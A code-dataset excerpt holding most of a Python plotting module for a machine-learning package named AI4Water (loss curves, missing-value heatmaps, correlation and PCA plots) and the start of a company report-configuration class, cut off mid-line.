name=\"loss_curve\"):\n \"\"\"Considering history is a dictionary of different arrays, possible training and validation loss arrays,\n this method plots those arrays.\"\"\"\n\n plt.clf()\n plt.close('all')\n fig = plt.figure()\n plt.style.use('ggplot')\n i = 1\n\n legends = {\n 'mean_absolute_error': 'Mean Absolute Error',\n 'mape': 'Mean Absolute Percentage Error',\n 'mean_squared_logarithmic_error': 'Mean Squared Logrithmic Error',\n 'pbias': \"Percent Bias\",\n \"nse\": \"Nash-Sutcliff Efficiency\",\n \"kge\": \"Kling-Gupta Efficiency\",\n \"tf_r2\": \"$R^{2}$\"\n }\n\n sub_plots = {1: {'axis': (1,1), 'width': 9, 'height': 6},\n 2: {'axis': (1, 1), 'width': 9, 'height': 6},\n 3: {'axis': (1, 2), 'wdith': 9, 'height': 6},\n 4: {'axis': (1, 2), 'width': 9, 'height': 6},\n 5: {'axis': (3, 1), 'width': 8, 'height': 12},\n 6: {'axis': (3, 1), 'width': 8, 'height': 12},\n 7: {'axis': (3, 2), 'width': 20, 'height': 20},\n 8: {'axis': (4, 2), 'width': 20, 'height': 20},\n 9: {'axis': (5, 2), 'width': 20, 'height': 20},\n 10: {'axis': (5, 2), 'width': 20, 'height': 20},\n 12: {'axis': (4, 3), 'width': 20, 'height': 20},\n }\n\n epochs = range(1, len(history['loss']) + 1)\n axis_cache = {}\n\n for key, val in history.items():\n\n m_name = key.split('_')[1:] if 'val' in key and '_' in key else key\n\n if isinstance(m_name, list):\n m_name = '_'.join(m_name)\n if m_name in list(axis_cache.keys()):\n axis = axis_cache[m_name]\n axis.plot(epochs, val, color=[0.96707953, 0.46268314, 0.45772886], label= 'Validation ')\n axis.legend()\n else:\n axis = fig.add_subplot(*sub_plots[len(history)]['axis'], i)\n axis.plot(epochs, val, color=[0.13778617, 0.06228198, 0.33547859], label= 'Training ')\n axis.legend()\n axis.set_xlabel(\"Epochs\")\n axis.set_ylabel(legends.get(key, key))\n axis_cache[key] = axis\n i += 1\n axis.set(frame_on=True)\n\n fig.set_figheight(sub_plots[len(history)]['height'])\n fig.set_figwidth(sub_plots[len(history)]['width'])\n self.save_or_show(fname=name, save=True if name is not None else False)\n return\n\n def plot_index(self, save=True, **kwargs):\n \"\"\"plots the datetime index of dataframe\"\"\"\n if isinstance(self.data, pd.DataFrame):\n self._plot_index(self.data, save=save, **kwargs)\n\n elif isinstance(self.data, list):\n for data in self.data:\n if isinstance(data, pd.DataFrame):\n self._plot_index(data, save=save, **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.values():\n if isinstance(data, pd.DataFrame):\n self._plot_index(data, save=save, **kwargs)\n return\n\n def _plot_index(self,\n index,\n save=True,\n fname=\"index\",\n figsize=(10,5),\n dpi=200,\n label_fs=18,\n title_fs=20,\n leg_fs=14,\n leg_ms=4,\n color='r',\n ):\n \"\"\"\n Plots the index of a datafram.\n index: can be pandas dataframe or index itself. if dataframe, its index will be used for plotting\n \"\"\"\n plt.close('all')\n if isinstance(index, pd.DataFrame):\n index=index.index\n\n idx = pd.DataFrame(np.ones(len(index)), index=index, columns=['Observations'])\n axis = idx.plot(linestyle='', marker='.', color=color, figsize=figsize)\n axis.legend(fontsize=leg_fs, markerscale=leg_ms)\n axis.set_xlabel(axis.get_xlabel(), fontdict={'fontsize': label_fs})\n axis.set_title(\"Temporal distribution of Observations\", fontsize=title_fs)\n axis.get_yaxis().set_visible(False)\n self.save_or_show(save=save, fname=fname, where='data', dpi=dpi)\n return\n\n def heatmap(self, cols=None, **kwargs):\n \"\"\"\n Plots a heatmap.\n :param cols:\n :param kwargs:\n :return:\n Examples:\n >>>vis = Visualizations(data)\n >>>vis.heatmap(save=False)\n \"\"\"\n if isinstance(self.data, pd.DataFrame):\n self.heatmap_df(self.data, cols=cols, **kwargs)\n\n elif isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n if isinstance(data, pd.DataFrame):\n self.heatmap_df(data, cols=cols[idx] if isinstance(cols, list) else None,\n fname=f\"data_heatmap_{idx}\", **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n if isinstance(data, pd.DataFrame):\n _cols = cols[data_name] if cols is not None else None\n self.heatmap_df(data, _cols, fname=data_name, **kwargs)\n return\n\n def heatmap_df(\n self,\n data:pd.DataFrame,\n cols=None,\n spine_color: str = \"#EEEEEE\",\n save=True,\n title=None,\n title_fs=16,\n fname=\"\",\n **kwargs\n ):\n \"\"\"\n plots a heat map of a dataframe. Helpful to show where missing values are located in a dataframe.\n :param data: pd.DataFrame,\n :param cols: list, columns from data to be used.\n :param spine_color:\n :param save: bool\n :param title: str, title of the plot\n :param title_fs: int, font size of title\n :param fname: str, name of saved file, only valid if save is True.\n :param kwargs: following kwargs are allowed:\n xtick_labels_fs, 12\n ytick_labels_fs, 20\n figsize: tuple\n any additional keyword argument will be passed to sns.heatmap\n\n :return:\n \"\"\"\n if cols is None:\n cols = data.columns\n _kwargs = {\n \"xtick_labels_fs\": 12,\n \"ytick_labels_fs\": 20,\n \"figsize\": (5 + len(cols)*0.25, 10 + len(cols)*0.1),\n }\n for k in _kwargs.keys():\n if k in kwargs:\n _kwargs[k] = kwargs.pop(k)\n\n show_time_on_yaxis = False\n if isinstance(data.index, pd.DatetimeIndex):\n show_time_on_yaxis = True\n\n fig, axis = plt.subplots(figsize=_kwargs['figsize'])\n # ax2 - Heatmap\n sns.heatmap(data[cols].isna(), cbar=False, cmap=\"binary\", ax=axis, **kwargs)\n\n axis.set_yticks(axis.get_yticks()[0::5].astype('int'))\n\n if show_time_on_yaxis:\n index = pd.date_range(data.index[0], data.index[-1], periods=len(axis.get_yticks()))\n # formatting y-ticklabels\n index = [d.strftime('%Y-%m-%d') for d in index]\n axis.set_yticklabels(index, fontsize=\"18\")\n else:\n axis.set_yticklabels(axis.get_yticks(),\n fontsize=_kwargs['ytick_labels_fs'])\n axis.set_xticklabels(\n axis.get_xticklabels(),\n horizontalalignment=\"center\",\n fontweight=\"light\",\n fontsize=_kwargs['xtick_labels_fs'],\n )\n axis.tick_params(length=1, colors=\"#111111\")\n axis.set_ylabel(\"Examples\", fontsize=\"24\")\n for _, spine in axis.spines.items():\n spine.set_visible(True)\n spine.set_color(spine_color)\n if title is not None:\n axis.set_title(title, fontsize=title_fs)\n\n return self.save_or_show(save=save, fname=fname+'_heat_map', where='data', dpi=500)\n\n def plot_missing(self, save:bool=True, cols=None, **kwargs):\n \"\"\"\n cols: columns to be used.\n save: if False, plot will be shown and not plotted.\n Examples:\n >>>vis = Visualizations(data)\n >>>vis.plot_missing(save=False)\n \"\"\"\n if isinstance(self.data, pd.DataFrame):\n self.plot_missing_df(self.data, cols=cols, save=save, **kwargs)\n\n elif isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n _cols = cols[idx] if isinstance(cols, list) else None\n self.plot_missing_df(data, cols=None, fname=str(idx), save=save, **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n if isinstance(data, pd.DataFrame):\n _cols = cols[data_name] if cols else None\n self.plot_missing_df(data, cols=_cols, fname=data_name, save=save, **kwargs)\n return\n\n def plot_missing_df(self,\n data:pd.DataFrame,\n cols=None,\n fname:str='',\n save:bool=True,\n **kwargs):\n \"\"\"\n kwargs:\n xtick_labels_fs\n ytick_labels_fs\n figsize\n any other keyword argument will be passed to sns.barplot()\n \"\"\"\n if cols is None:\n cols = data.columns\n data = data[cols]\n # Identify missing values\n mv_total, mv_rows, mv_cols, _, mv_cols_ratio = _missing_vals(data).values()\n\n _kwargs = {\n \"xtick_labels_fs\": 12,\n \"ytick_labels_fs\": 20,\n \"figsize\": (5 + len(cols)*0.25, 10 + len(cols)*0.1),\n }\n for k in _kwargs.keys():\n if k in kwargs:\n _kwargs[k] = kwargs.pop(k)\n if mv_total < 6:\n print(\"No missing values found in the dataset.\")\n else:\n # Create figure and axes\n plt.close('all')\n fig = plt.figure(figsize=_kwargs['figsize'])\n gs = fig.add_gridspec(nrows=1, ncols=1, left=0.1, wspace=0.05)\n ax1 = fig.add_subplot(gs[:1, :5])\n\n # ax1 - Barplot\n ax1 = sns.barplot(x=list(data.columns), y=np.round(mv_cols_ratio * 100, 2), ax=ax1, **kwargs)\n\n ax1.set(frame_on=True, xlim=(-0.5, len(mv_cols) - 0.5))\n ax1.set_ylim(0, np.max(mv_cols_ratio) * 100)\n ax1.grid(linestyle=\":\", linewidth=1)\n\n ax1.set_yticklabels(ax1.get_yticks(), fontsize=\"18\")\n ax1.yaxis.set_major_formatter(ticker.FormatStrFormatter('%.1f'))\n ax1.set_ylabel(\"Missing Percentage\", fontsize=_kwargs['ytick_labels_fs'])\n\n ax1.set_xticklabels(\n ax1.get_xticklabels(),\n horizontalalignment=\"center\",\n fontweight=\"light\",\n rotation=90,\n fontsize=_kwargs['xtick_labels_fs'],\n )\n ax1.tick_params(axis=\"y\", colors=\"#111111\", length=1)\n\n # annotate missing values on top of the bars\n for rect, label in zip(ax1.patches, mv_cols):\n height = rect.get_height()\n ax1.text(\n 0.1 + rect.get_x() + rect.get_width() / 2,\n height + height*0.02,\n label,\n ha=\"center\",\n va=\"bottom\",\n rotation=\"90\",\n alpha=0.5,\n fontsize=\"11\",\n )\n self.save_or_show(save=save, fname=fname+'_missing_vals', where='data', dpi=500)\n return\n\n def plot_histograms(self, save=True, cols=None, **kwargs):\n \"\"\"Plots distribution of data as histogram.\n kwargs: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.hist.html\n \"\"\"\n if isinstance(self.data, pd.DataFrame):\n self.plot_his_df(self.data, save=save, cols=cols, **kwargs)\n\n elif isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n self.plot_his_df(data, prefix=str(idx), cols=cols, save=save, **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n if isinstance(data, pd.DataFrame):\n self.plot_his_df(data, prefix=data_name, save=save, **kwargs)\n return\n\n def plot_his_df(self, data:pd.DataFrame, prefix='', cols=None, save=True, bins=100, figsize=(20, 14), **kwargs):\n if cols is None:\n cols = data.columns\n data[cols].hist(bins=bins, figsize=figsize, **kwargs)\n self.save_or_show(fname=f\"hist_{prefix}\", save=save, where='data')\n return\n\n def feature_feature_corr(self, cols=None, remove_targets=True, save=True, **kwargs):\n \"\"\"\n >>>from AI4Water.utils.visualizations import Visualizations\n >>>vis = Visualizations(data)\n >>>vis.feature_feature_corr(save=False)\n \"\"\"\n if cols is None:\n cols = self.in_cols if remove_targets else self.in_cols + self.out_cols\n if isinstance(cols, dict):\n cols = None\n\n if isinstance(self.data, pd.DataFrame):\n self.feature_feature_corr_df(self.data, cols, save=save, **kwargs)\n\n elif isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n if isinstance(data, pd.DataFrame):\n self.feature_feature_corr_df(data, cols[idx] if cols is not None else None,\n prefix=str(idx), save=save, **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n if isinstance(data, pd.DataFrame):\n self.feature_feature_corr_df(data, cols, prefix=data_name, save=save, **kwargs)\n return\n\n def feature_feature_corr_df(self,\n data,\n cols=None,\n prefix='',\n save=True,\n split=None,\n threshold=0,\n method='pearson',\n **kwargs):\n \"\"\"\n split : Optional[str], optional\n Type of split to be performed {None, \"pos\", \"neg\", \"high\", \"low\"}, by default None\n method : str, optional\n {\"pearson\", \"spearman\", \"kendall\"}, by default \"pearson\"\n\n kwargs\n * vmax: float, default is calculated from the given correlation \\\n coefficients.\n Value between -1 or vmin <= vmax <= 1, limits the range of the cbar.\n * vmin: float, default is calculated from the given correlation \\\n coefficients.\n Value between -1 <= vmin <= 1 or vmax, limits the range of the cbar.\n To plot positive correlation only:\n feature_feature_corr_df(model.data, list(model.data.columns), split=\"pos\")\n To plot negative correlation only\n feature_feature_corr_df(model.data, list(model.data.columns), split=\"neg\")\n \"\"\"\n plt.close('all')\n\n if cols is None:\n cols = data.columns\n\n corr = data[cols].corr(method=method)\n\n if split == \"pos\":\n corr = corr.where((corr >= threshold) & (corr > 0))\n elif split == \"neg\":\n corr = corr.where((corr <= threshold) & (corr < 0))\n\n mask = np.zeros_like(corr, dtype=np.bool)\n\n vmax = np.round(np.nanmax(corr.where(~mask)) - 0.05, 2)\n vmin = np.round(np.nanmin(corr.where(~mask)) + 0.05, 2)\n # width x height\n fig, ax = plt.subplots(figsize=kwargs.get('figsize', (5 + len(cols)*0.25, 9 + len(cols)*0.1)))\n\n _kwargs = dict()\n _kwargs['annot'] = kwargs.get('annot', True if len(cols) <= 20 else False)\n _kwargs['cmap'] = kwargs.get('cmap', \"BrBG\")\n _kwargs['vmax'] = kwargs.get('vmax', vmax)\n _kwargs['vmin'] = kwargs.get('vmin', vmin)\n _kwargs['linewidths'] = kwargs.get('linewidths', 0.5)\n _kwargs['annot_kws'] = kwargs.get('annot_kws', {\"size\": 10})\n _kwargs['cbar_kws'] = kwargs.get('cbar_kws', {\"shrink\": 0.95, \"aspect\": 30})\n\n ax = sns.heatmap(corr, center=0, fmt=\".2f\", ax=ax, **_kwargs)\n ax.set(frame_on=True)\n self.save_or_show(save, fname=f\"{split if split else ''}_feature_corr_{prefix}\", where=\"data\")\n return\n\n def grouped_scatter(self, inputs=True, outputs=True, cols=None, save=True, max_subplots=8, **kwargs):\n\n fname = \"scatter_plot_\"\n\n if cols is None:\n cols = []\n\n if inputs:\n cols += self.in_cols\n fname += \"inputs_\"\n if outputs:\n fname += \"outptuts_\"\n else:\n assert isinstance(cols, list)\n\n if isinstance(self.data, pd.DataFrame):\n self.grouped_scatter_plot_df(self.data[cols], max_subplots, save, **kwargs)\n\n elif isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n if isinstance(data, pd.DataFrame):\n _cols = cols + [self.out_cols[idx]] if outputs else cols\n self.grouped_scatter_plot_df(data[_cols], max_subplots, save=save, prefix=str(idx), **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n if isinstance(data, pd.DataFrame):\n self.grouped_scatter_plot_df(data, max_subplots, save=save, prefix=data_name,\n **kwargs)\n return\n\n def grouped_scatter_plot_df(self, data:pd.DataFrame, max_subplots:int=10, save=True, prefix='', **kwargs):\n \"\"\"\n max_subplots: int, it can be set to large number to show all the scatter plots on one axis.\n \"\"\"\n data = data.copy()\n if data.shape[1] <= max_subplots:\n self._grouped_scatter_plot(data, save=save,name=f'grouped_scatter_{prefix}', **kwargs)\n else:\n tot_plots = find_tot_plots(data.shape[1], max_subplots)\n for i in range(len(tot_plots) - 1):\n st, en = tot_plots[i], tot_plots[i + 1]\n sub_df = data.iloc[:, st:en]\n self._grouped_scatter_plot(sub_df, name=f'grouped_scatter_{prefix}_{st}_{en}', **kwargs)\n return\n\n def _grouped_scatter_plot(self, df, save=True, name='grouped_scatter', **kwargs):\n plt.close('all')\n sns.set()\n sns.pairplot(df, size=2.5, **kwargs)\n self.save_or_show(fname=name, save=save, where='data')\n return\n\n def plot_pcs(self, num_pcs=None, save=True, save_as_csv=False, figsize=(12, 8), **kwargs):\n \"\"\"Plots principle components.\n kwargs will go to sns.pairplot.\"\"\"\n if isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n self._plot_pcs(data[self.in_cols],\n num_pcs, save=save, prefix=str(idx), save_as_csv=save_as_csv,\n hue=self.out_cols[idx], figsize=figsize, **kwargs)\n\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n self._plot_pcs(data[self.in_cols], num_pcs, save=save, prefix=data_name, save_as_csv=save_as_csv,\n hue=self.out_cols,\n figsize=figsize, **kwargs)\n else:\n self._plot_pcs(self.data[self.in_cols], num_pcs, save=save, save_as_csv=save_as_csv, hue=self.out_cols,\n figsize=figsize, **kwargs)\n return\n\n def _plot_pcs(self, data, num_pcs, save=True, prefix='', save_as_csv=False, hue=None, figsize=(12,8), **kwargs):\n\n if num_pcs is None:\n num_pcs = int(data.shape[1]/2)\n\n #df_pca = data[self.in_cols]\n #pca = PCA(n_components=num_pcs).fit(df_pca)\n #df_pca = pd.DataFrame(pca.transform(df_pca))\n\n transformer = Transformations(data=data, method='pca', n_components=num_pcs, replace_nans=True)\n df_pca = transformer.transform()\n\n pcs = ['pc' + str(i + 1) for i in range(num_pcs)]\n df_pca.columns = pcs\n\n if hue is not None:\n if isinstance(hue, list):\n hue = hue[0]\n if hue in data:\n df_pca[hue] = data[hue]\n\n if df_pca[hue].isna().sum() > 0: # output columns contains nans, so don't use it as hue.\n hue = None\n else: # ignore it\n hue = None\n\n if save_as_csv:\n df_pca.to_csv(os.path.join(self.path, f\"data\\\\first_{num_pcs}_pcs_{prefix}\"))\n\n plt.close('all')\n plt.figure(figsize=figsize)\n sns.pairplot(data=df_pca, vars=pcs, hue=hue, **kwargs)\n self.save_or_show(fname=f\"first_{num_pcs}_pcs_{prefix}\", save=save, where='data')\n return\n\n def plot_data(self, save=True, freq=None, cols=None, max_subplots=10, **kwargs):\n \"\"\"\n :param save:\n :param max_subplots: int, number of subplots within one plot. Each feature will be shown in a separate subplot.\n :param kwargs: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.plot.html\n :param freq: str, one of 'daily', 'weekly', 'monthly', 'yearly', determines interval of plot of data. It is\n valid for only time-series data.\n :param cols: columns in self.data to plot\n :return:\n\n ------\n examples:\n\n >>>model.plot_data(subplots=True, figsize=(12, 14), sharex=True)\n >>>model.plot_data(freq='monthly', subplots=True, figsize=(12, 14), sharex=True)\n \"\"\"\n # TODO, this method should be available from `model` as well\n if isinstance(self.data, pd.DataFrame):\n self.plot_df(self.data, cols=cols, save=save, freq=freq, max_subplots=max_subplots, **kwargs)\n\n if isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n self.plot_df(data, cols=cols[idx] if isinstance(cols, list) else None,\n save=save, freq=freq, prefix=str(idx), max_subplots=max_subplots, **kwargs)\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n if isinstance(data, pd.DataFrame):\n self.plot_df(data, cols=cols, prefix=data_name, save=save, freq=freq, max_subplots=max_subplots,\n **kwargs)\n return\n\n def plot_df(self, df, cols=None, save=True, freq=None, max_subplots=10,\n prefix='',\n leg_kws=None,\n label_kws=None,\n tick_kws=None,\n **kwargs):\n \"\"\"Plots each columns of dataframe and saves it if `save` is True.\n max_subplots: determines how many sub_plots are to be plotted within one plot. If dataframe contains columns\n greater than max_subplots, a separate plot will be generated for remaining columns.\n \"\"\"\n assert isinstance(df, pd.DataFrame)\n if leg_kws is None:\n leg_kws = {'fontsize': 14}\n if label_kws is None:\n label_kws = {'fontsize': 14}\n if tick_kws is None:\n tick_kws = {'axis':\"both\", 'which':'major', 'labelsize':12}\n\n if cols is None:\n cols = list(df.columns)\n df = df[cols]\n\n if df.shape[1] <= max_subplots:\n\n if freq is None:\n kwargs = plot_style(df, **kwargs)\n axis = df.plot(**kwargs)\n if isinstance(axis, np.ndarray):\n for ax in axis:\n set_axis_paras(ax, leg_kws, label_kws, tick_kws)\n else:\n set_axis_paras(axis, leg_kws, label_kws, tick_kws)\n\n self.save_or_show(save=save, fname=f\"input_{prefix}\", where='data')\n else:\n self.plot_df_with_freq(df, freq, save, **kwargs)\n else:\n tot_plots = find_tot_plots(df.shape[1], max_subplots)\n\n for i in range(len(tot_plots) - 1):\n st, en = tot_plots[i], tot_plots[i + 1]\n sub_df = df.iloc[:, st:en]\n\n if freq is None:\n kwargs = plot_style(sub_df, **kwargs)\n axis = sub_df.plot(**kwargs)\n for ax in axis:\n ax.legend(**leg_kws)\n ax.set_ylabel(ax.get_ylabel(), **label_kws)\n ax.set_xlabel(ax.get_xlabel(), **label_kws)\n ax.tick_params(**tick_kws)\n self.save_or_show(save=save, fname=f'input_{prefix}_{st}_{en}', where='data')\n else:\n self.plot_df_with_freq(sub_df, freq, save, prefix=f'{prefix}_{st}_{en}', **kwargs)\n return\n\n def plot_df_with_freq(self, df:pd.DataFrame, freq:str, save:bool=True, prefix:str='', **kwargs):\n \"\"\"Plots a dataframe which has data as time-series and its index is pd.DatetimeIndex\"\"\"\n\n validate_freq(df, freq)\n\n st_year = df.index[0].year\n en_year = df.index[-1].year\n\n for yr in range(st_year, en_year + 1):\n\n _df = df[df.index.year == yr]\n\n if freq == 'yearly':\n kwargs = plot_style(_df, **kwargs)\n _df.plot(**kwargs)\n self.save_or_show(save=save, fname=f'input_{prefix}_{str(yr)}', where='data')\n\n elif freq == 'monthly':\n st_mon = _df.index[0].month\n en_mon = _df.index[-1].month\n\n for mon in range(st_mon, en_mon+1):\n\n __df = _df[_df.index.month == mon]\n kwargs = plot_style(__df, **kwargs)\n __df.plot(**kwargs)\n self.save_or_show(save=save, fname=f'input_{prefix}_{str(yr)} _{str(mon)}', where='data/monthly')\n\n elif freq == 'weekly':\n st_week = _df.index[0].isocalendar()[1]\n en_week = _df.index[-1].isocalendar()[1]\n\n for week in range(st_week, en_week+1):\n __df = _df[_df.index.week == week]\n kwargs = plot_style(__df, **kwargs)\n __df.plot(**kwargs)\n self.save_or_show(save=save, fname=f'input_{prefix}_{str(yr)} _{str(week)}', where='data/weely')\n return\n\n\ndef set_axis_paras(axis, leg_kws, label_kws, tick_kws):\n axis.legend(**leg_kws)\n axis.set_ylabel(axis.get_ylabel(), **label_kws)\n axis.set_xlabel(axis.get_xlabel(), **label_kws)\n axis.tick_params(**tick_kws)\n return\n\n\ndef plot_style(df:pd.DataFrame, **kwargs):\n if 'style' not in kwargs and df.isna().sum().sum() > 0:\n kwargs['style'] = ['.' for _ in range(df.shape[1])]\n return kwargs\n\n\ndef validate_freq(df, freq):\n assert isinstance(df.index, pd.DatetimeIndex), \"index of dataframe must be pandas DatetimeIndex\"\n assert freq in [\"weekly\", \"monthly\",\n \"yearly\"], f\"freq must be one of {'weekly', 'monthly', 'yearly'} but it is {freq}\"\n return\n\n\ndef regplot(true, pred, **kwargs):\n \"\"\"\n :param true: array like\n :param pred, array like\n Following kwargs are allowed:\n figsize: tuple\n colorbar: for plt.colorbar\n cmap: for plt.scatter\n s: for plt.scatter\n :Note, This function will neither show nor saves the plot. The user has to manually\n do it after calling this function as shown below.\n >>>from AI4Water.utils.visualizations import regplot\n >>>import numpy as np\n >>>true = np.random.random(100)\n >>>pred = np.random.random(100)\n >>>regplot(true, pred)\n >>>plt.show()\n \"\"\"\n # https://seaborn.pydata.org/generated/seaborn.regplot.html\n if any([isinstance(true, _type) for _type in [pd.DataFrame, pd.Series]]):\n true = true.values.reshape(-1,)\n if any([isinstance(pred, _type) for _type in [pd.DataFrame, pd.Series]]):\n pred = pred.values.reshape(-1,)\n\n plt.close('all')\n\n s = kwargs.get('s', 20)\n cmap = kwargs.get('cmap', 'winter') # https://matplotlib.org/stable/tutorials/colors/colormaps.html\n figsize = kwargs.get('figsize', (8, 5.5))\n\n plt.figure(figsize=figsize)\n points = plt.scatter(true, pred, c=pred, s=s, cmap=cmap) # set style options\n\n if kwargs.get('annotate', True):\n plt.annotate(f'$R^{2}$: {round(RegressionMetrics(true, pred).r2(), 3)}', xy=(0.50, 0.95), xycoords='axes fraction',\n horizontalalignment='right', verticalalignment='top', fontsize=16)\n\n if kwargs.get('colorbar', False):\n plt.colorbar(points)\n\n sns.regplot(x=true, y=pred, scatter=False, color=\".1\")\n plt.xlabel('Observed', fontsize=14)\n plt.ylabel('Predicted', fontsize=14)\n\n return","sub_path":"AI4Water/utils/visualizations.py","file_name":"visualizations.py","file_ext":"py","file_size_in_byte":48550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"471771720","text":"from __future__ import annotations\n\nimport json\n\nfrom models import ReportAction, ReportTarget, ReportTaskType\nfrom typing import Dict, List, Optional, Union\n\nclass CompanyConfiguration:\n class Metadata:\n schema: str\n display_name: str\n currency: str\n\n def __init__(self, configuration: Dict[str, any]):\n self.schema = configuration['schema']\n self.display_name = configuration['display_name']\n self.currency = configuration['currency']\n \n @property\n def as_dict(self) -> Dict[str, any]:\n return {\n 'schema': self.schema,\n 'display_name': self.display_name,\n 'currency': self.currency\n }\n \n class Product:\n identifier: str\n display_name: str\n platform_ids: Dict[str, any]\n\n def __init__(self, identifier: str, configuration: Dict[str, any]):\n self.identifier = identifier\n self.display_name = configuration['display_name']\n self.platform_ids = configuration['platform_ids']\n \n @property\n def as_dict(self) -> Dict[str, any]:\n return {\n 'display_name': self.display_name,\n 'platform_ids': self.platform_ids,\n }\n \n class TaskSet:\n identifier: str\n config: Dict[str, any]\n action: ReportAction\n target: ReportTarget\n products: List[CompanyConfiguration.Product]\n credentials_key: Optional[str]\n company_metadata: CompanyConfiguration.Metadata\n task_types: List[ReportTaskType]\n\n def __init__(self, identifier: str, configuration: Dict[str, any], products_context: Dict[str, CompanyConfiguration.Product], company_metadata: CompanyConfiguration.Metadata):\n self.identifier = identifier\n self.config = configuration\n self.action = ReportAction(configuration['action'])\n self.target = ReportTarget(configuration['target'])\n self.products = [\n products_context[i] for i in configuration['product_identifiers']\n ] if 'product_identifiers' in configuration else []\n self.credentials_key = configuration['credentials_key'] if 'credentials_key' in configuration else None\n self.company_metadata = company_metadata\n self.task_types = [ReportTaskType(t) for t in configuration['task_types']]\n\n @property\n def as_dict(self) -> Dict[str, any]:\n return {\n **self.config,\n 'task_types': [t.value for t in self.task_types],\n 'product_identifiers': [p.identifier for p in self.products],\n 'credentials_key': self.credentials_key if self.credentials_key else None,\n }\n\n @property\n def task_type_identifiers(self) -> List[str]:\n return list(sorted({t.value for t in self.task_types}))\n\n def filtered(self, task_types_filter: Optional[List[ReportTaskType]]=None, products_filter: Optional[List[str]]=None) -> CompanyConfiguration.TaskSet:\n filtered = CompanyConfiguration.TaskSet(\n identifier=self.identifier,\n configuration=self.as_dict,\n products_context={p.identifier: p for p in self.products},\n company_metadata=self.company_metadata\n )\n if task_types_filter is not None:\n filtered.task_types = [t for t in filtered.task_types if t in task_types_filter]\n if products_filter is not None:\n filtered.products = [p for p in filtered.products if p.identifier in products_filter]\n return filtered\n\n def product_for_platform_id(self, platform_id: str) -> Optional[CompanyConfiguration.Product]:\n products = {p for p in self.products if platform_id in {str(i) for i in p.platform_ids.values()}}\n if len(products) > 1:\n raise ValueError(f'Multiple products matched by platform ID {platform_id}', products)\n return next(iter(products)) if products else None\n\n # ----------------------------\n # class CompanyConfiguration:\n # ----------------------------\n identifier: str\n metadata: CompanyConfiguration.Metadata\n _products: Dict[str, Product]\n _task_sets: Dict[str, TaskSet]\n\n @classmethod\n def from_legacy(cls, identifier, legacy_configuration: Dict[str, any]) -> CompanyConfiguration:\n configuration = {\n 'company_metadata': legacy_configuration['company_metadata'],\n 'products': legacy_configuration['products'],\n 'task_sets': {},\n }\n action_configs = legacy_configuration['actions']\n for action_key, action_configs in action_configs.items():\n for target, target_configs in action_configs['targets'].items():\n for task_set_identifier, task_set_config in target_configs['task_sets'].items():\n configuration['task_sets'][f'{action_key}_{target}_{task_set_identifier}'] = {\n **task_set_config,\n 'identifier': f'{action_key}_{target}_{task_set_identifier}',\n 'action': action_key,\n 'target': target,\n }\n return cls(identifier=identifier, configuration=configuration)\n\n def __init__(self, identifier: str, configuration: Dict[str, any]):\n self.identifier = identifier\n company_metadata = {\n 'schema': self.identifier,\n **configuration['company_metadata'],\n }\n self.metadata = CompanyConfiguration.Metadata(configuration=company_metadata)\n\n products_config = configuration['products']\n self._products = {\n i: CompanyConfiguration.Product(identifier=i, configuration=products_config[i])\n for i in products_config.keys()\n }\n \n self._task_sets = {\n task_set_identifier: CompanyConfiguration.TaskSet(\n identifier=task_set_identifier,\n configuration=task_set_config,\n products_context=self._products,\n company_metadata=self.metadata\n ) for task_set_identifier, task_set_config in configuration['task_sets'].items()\n }\n\n @property\n def products(self) -> List[CompanyConfiguration.Product]:\n return [self._products[i] for i in sorted(self._products.keys())]\n\n @property\n def task_sets(self) -> List[CompanyConfiguration.TaskSet]:\n return [self._task_sets[i] for i in sorted(self._task_sets.keys())]\n\n @property\n def product_identifiers(self) -> List[str]:\n return [p.identifier for p in self.products]\n\n @property\n def task_set_identifiers(self) -> List[str]:\n return [t.identifier for t in self.task_sets]\n\n @property\n def action_identifiers(self) -> List[str]:\n return list(sorted({t.action.value for t in self.task_sets}))\n\n @property\n def target_identifiers(self) -> List[str]:\n return list(sorted({t.target.value for t in self.task_sets}))\n\n @property\n def task_type_identifiers(self) -> List[str]:\n return list(sorted({v for t in self.task_sets for v in t.task_type_identifiers}))\n\n @property\n def as_dict(self) -> Dict[str, any]:\n return {\n 'company_metadata': self.metadata.as_dict,\n 'products': {p.identifier: p.as_dict for p in self.products},\n 'task_sets': {t.identifier: t.as_dict for t in self.task_sets}\n }\n\n def filtered(self, actions_filter: Optional[List[ReportAction]]=None, targets_filter: Optional[List[ReportTarget]]=None, task_sets_filter: Optional[List[str]]=None, task_types_filter: Optional[List[ReportTaskType]]=None) -> CompanyConfiguration:\n filtered = CompanyConfiguration(identifier=self.identifier, configuration=self.as_dict)\n\n if actions_filter is not None:\n filtered._task_sets = {s.identifier: s for s in filtered.task_sets if s.action in actions_filter}\n if targets_filter is not None:\n filtered._task_sets = {s.identifier: s for s in filtered.task_sets if s.target in targets_filter}\n if task_sets_filter is not None:\n filtered._task_sets = {s.identifier: s for s in filtered.task_sets if s.identifier in task_sets_filter}\n\n filtered._task_sets = {s.identifier: s.filtered(task_types_filter=task_types_filter) for s in filtered.task_sets}\n filtered._task_sets = {i: s for i, s in filtered._task_sets.items() if s.task_types}\n return filtered\n\nclass CompanyConfigurations:\n _configs: Dict[str, CompanyConfiguration]\n\n def __init__(self, configuration: Dict[str, any]):\n if 'legacy' in configuration and configuration['legacy']:\n del configuration['legacy']\n self._configs = {i: CompanyConfiguration.from_legacy(identifier=i, legacy_configuration=configuration[i]) for i 